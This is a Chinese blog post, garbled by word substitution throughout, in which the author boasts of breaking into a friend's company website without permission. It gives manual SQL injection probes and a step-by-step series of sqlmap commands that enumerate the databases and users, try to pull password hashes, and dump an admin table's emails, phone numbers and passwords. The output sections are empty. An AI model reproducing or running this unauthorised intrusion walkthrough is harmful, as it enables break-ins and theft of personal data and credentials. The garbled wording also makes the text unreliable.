我是如何一步步攻破一家互联网公司的 8090安适门户
比来在研究Web安适相关的常识,出格是SQL注入类的相关常识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来打击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小感动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。
【作案工具介绍】
(1) AppScan渗透扫描工具
Appscan是Web应用措施渗透测试舞台上使用最广泛的工具之一。它是一个桌面应用措施,它有助于专业安适人员进行Web应用措施自动化脆弱性评估。
(2) Sqlmap渗透测试工具
Sqlmap是一个自动化的SQL注入工具,其主要成果是扫描,发明并操作给定的URL的SQL注入缝隙。
【作案细节如下】
首先使用Appscan工具,对互联网公司的官网进行扫描,扫描功效如下:
在这56个安适性问题中,找到你感兴趣的链接,例如下面这条:
?id=1
为何要挑出这一条呢?因为它对付SQL注入对照范例,下面普及下SQL注入常用手法。首先用如下语句,确定该网站是否存在注入点:
?id=1 原网站
?id=1’ 堕落或显示不正常
?id=1 and 1=1 堕落或显示不正常
?id=1 and 1=2 堕落或显示不正常
如果有堕落,说明存在注入点。
在判断完?id=1该链接存在注入点后,接下来就启动我们的渗透测试工具Sqlmap,进行下一步的注入事情,详细过程如下:
1) 再次确认方针注入点是否可用:
python sqlmap.py -u ?id=1
参数:
-u:指定注入点url
功效:
注入功效展示:
a. 参数id存在基于布尔的盲注,即可以按照返回页面判断条件真假的注入。
b. 参数id存在基于时间的盲注,即不能按照页面返回内容判断任何信息,用条件语句检察时间延迟语句是否执行(即页面返回时间是否增加)来判断。
c. 数据库类型为:MySql 5.0.12
2) 暴库所有数据库:
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
python sqlmap.py -u ?id=1 –dbs
参数:
–dbs:dbs前面有两条杠,列出所有数据库。
功效:
功效显示该sqlserver中共包罗3个可用的数据库。
3) 获取当前使用的数据库
python sqlmap.py -u ?id=1 –current-db
参数:
–current-db:当前所使用的数据库。
功效:
4) 获取当前数据库使用账户
python sqlmap.py -u ?id=1 –current-user
5) 列出sqlserver所有用户
python sqlmap.py -u ?id=1 –users
6) 获取当前用户数据库账户与暗码
python sqlmap.py -u ?id=1 –passwords
功效显示该用户可能无读取相关系统的权限。
7) 列出数据库中的表
python sqlmap.py -u ?id=1 -D xxx_store –tables
参数:
-D:指定数据库名称
–tables:列出表
功效:
功效显示共列出了69张表。
8) 列出表中字段
python sqlmap.py -u ?id=1 -D xxx_store -T mall_admin –columns
参数:
-D:指定数据库名称
-T:指定要列出字段的表
–columns:指定列出字段
功效:
9)暴字段内容
python sqlmap.py -u ?id=1 -D xxx_store -T mall_admin -C “ag_id,email,id,mobile,name,password,status” –dump
参数:
-C :指定要暴的字段
–dump:将功效导出
如果字段内容太多,需要花费很多时间。可以指定导出特定范畴的字段内容,命令如下:
python sqlmap.py -u ?id=1 -D xxx_store -T mall_admin -C “ag_id,email,id,mobile,name,password,status” –start 1 –stop 10 –dump
参数:
–start:指定开始的行
–stop:指定结束的行
此条命令的含义为:导出数据库xxx_store中的表mall_admin中的关于字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的数据内容。
功效如下:
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12588.html